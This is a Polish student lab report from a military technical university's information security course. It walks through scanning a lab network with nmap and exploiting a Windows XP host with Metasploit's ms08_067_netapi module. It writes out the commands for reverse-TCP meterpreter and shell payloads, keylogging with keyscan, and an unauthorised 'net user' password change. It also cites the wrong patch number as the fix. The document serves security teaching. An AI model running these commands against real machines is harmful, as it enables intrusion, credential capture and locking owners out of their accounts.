Wojskowa Akademia Techniczna
Podstawy bezpieczeństwa informacji
Sprawozdanie z ćwiczeń laboratoryjnych nr 1.
Prowadzący: mgr inż. Bartosz Kryński
Wykonali:
Jakub Łochocki
Grupa: I9M1S1
Nr albumu: 45303
Mateusz Fruba
Grupa: I9M1S1
Nr albumu:
Włączyć z płyty wersję LiveCD system Backtrack, następnie za pomocą narzędzia nmap przeskanować całą sieć lokalną w poszukiwaniu komputera z innym systemem operacyjnym niż Backtrack.
Następnie sprawdzić, czy na w/w komputerze jest otwarty port 8080.
Wykorzystać exploit-a w celu przechwyceniu hasła administratora (tzw. Keylogger).
Wykorzystać exploit-a w celu zdalnej i nieautoryzowanej zmiany hasła administratora.
Opis narzędzi
BackTrack to specjalistyczna dystrybucja Linuksa szczególnie ceniona wśród specjalistów IT i audytorów zabezpieczeń. Dystrybucja ta stanowi unikatowy zbiór kilkuset profesjonalnych, bardzo różnorodnych narzędzi do monitorowania i analizy ruchu sieciowego, zbierania informacji na temat sieci i znajdujących się w niej urządzeń, a także kontroli stanu zabezpieczeń sieci i ich łamania oraz przeprowadzania testów penetracyjnych. BackTrack zawiera wbudowane sterowniki do większości najpopularniejszych sieciowych kart bezprzewodowych, dzięki czemu można go uruchomić na praktycznie każdym notebooku i od razu przystąpić do pracy - bez instalacji na komputerze, bez pozostawiania jakichkolwiek śladów aktywności. Narzędzie nmap służy do skanowania sieci pod kątem otwartych portów oraz użytkowanych usług. Metasploit jest natomiast narzędziem wykorzystywanym do testów penetracyjnych i łamania zabezpieczeń systemów teleinformatycznych. Metasploit posiada bazę gotowych exploitów oraz udostępnia interfejs, dzięki któremu można przygotowywać własne, korzystając z gotowych komponentów. Exploit jako narzędzie pozwala poprzez wykorzystanie błędów i luki w oprogramowaniu na uzyskanie dostępu nad daną maszyną. Natomiast moduł ms08_067 jest w stanie wykorzystać krytyczny błąd w zabezpieczeniach. Eksploatacja luki polega na wysłaniu do serwera specjalnie spreparowanego zapytania RPC, co może prowadzić do zdalnego wykonania kodu i w efekcie do przejęcia kontroli nad atakowanym systemem. Warunkiem udanego włamania jest brak w systemie poprawki bezpieczeństwa KB921883.
Przebieg ćwiczenia
Ćwiczenie rozpocząłem od uruchomienia płyty z systemem Backtrack. Po uruchomieniu systemu się systemu rozpocząłem poszukiwania komputera (celu ataku):
Wywołanie komendy nmap –A –vv –p 8080 10.3.236.* gdzie:
A – agresywne opcje skanowania,
vv - podwyższenie poziomu,
p – skanowanie po danych zakresie portów,
Komputer, cel ataku posiadał adres IP 10.3.236.107, działał na systemie operacyjnym Windows XP z SP2 PL.
Następnie uruchomiłem środowisko metasploit za pomocą komendy msfconsole oraz wykorzystałem exploit – celem jest hasło użytkownika systemu (rys. 1):
msf > svn update - aktualizacyjnego środowiska Metasploit
msf > use exploit/windows/smb/ms08_067_netapi - wejście w tryb konfiguracji modułu exploitu
msf exploit(ms08_067_netapi) > set RHOST 10.3. 236.107 - ustawienie adresu IP docelowego
msf exploit(ms08_067_netapi) > set LHOST 10.3. 236.113 - ustawienie adresu IP naszego systemu
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp - wybór oraz wejście w tryb konfiguracji modułu payloadu
msf exploit(ms08_067_netapi) > exploit - uruchomiemie exploitu ms08_067_netapi
Rys. 1. Wykorzystanie środowiska metasploit.
Dalej po uzyskaniu dostępu do exploita, pozyskaliśmy hasło do systemu (rys.2):
meterpreter > ps – m - wyświetlenie wszystkich uruchomionych procesów na atakowanym komputerze
meterpreter > migrate 660 – włączenie się do procesu o numerze 660
meterpeter > keyscan_start (włączenie nasłuchiwania naciśniętych klawiszy)
meterpreter > keyscan_dump (wyświetlenie przechwyconych znaków)
Rys.2. Pozyskanie hasła
Następnie dokonałem zmiany hasła administratora:
msf > svn update - uruchomienie procesu aktualizacyjnego Metasploit
msf > use exploit/windows/smb/ms08_067_netapi - wejście w tryb konfiguracji modułu exploitu ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.3.237.191 - ustawienie adresu IP docelowego komputera
msf exploit(ms08_067_netapi) > set LHOST 10.3.237.105 - ustawienie adresu IP naszego systemu
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp - wejście w tryb konfiguracji modułu payloadu shell /reverse_tcp
msf exploit(ms08_067_netapi) > exploit - uruchomiemie exploitu ms08_067_netapi
Wykonane polecenia pozwoliły na uzyskanie dostęp do interpretera poleceń cmd.exe. Wywołanie polecenia C:\Windows\System32\net user Clico nowehaslo pozwoliło na zmianę hasła użytkownika Clico.
Backtrack jako dystrybucja Linuxa, oparta o Ubuntu zawiera narzędzia do testowania i łamania zabezpieczeń systemów komputerowych. Wykorzystując słabość zabezpieczeń komputerów możemy uzyskiwać nad nimi kontrolę. To właśnie było celem naszego ćwiczenia.
Podczas ćwiczenia uzyskaliśmy dostęp do systemeu komputera, który był celem ataku. Dokonaliśmy odczytania i zmiany hasła administratora. Ćwiczenie zostało przeprowadzone prawidłowo. Zmiana hasła uniemożliwiła dostęp do atakowanego komputera.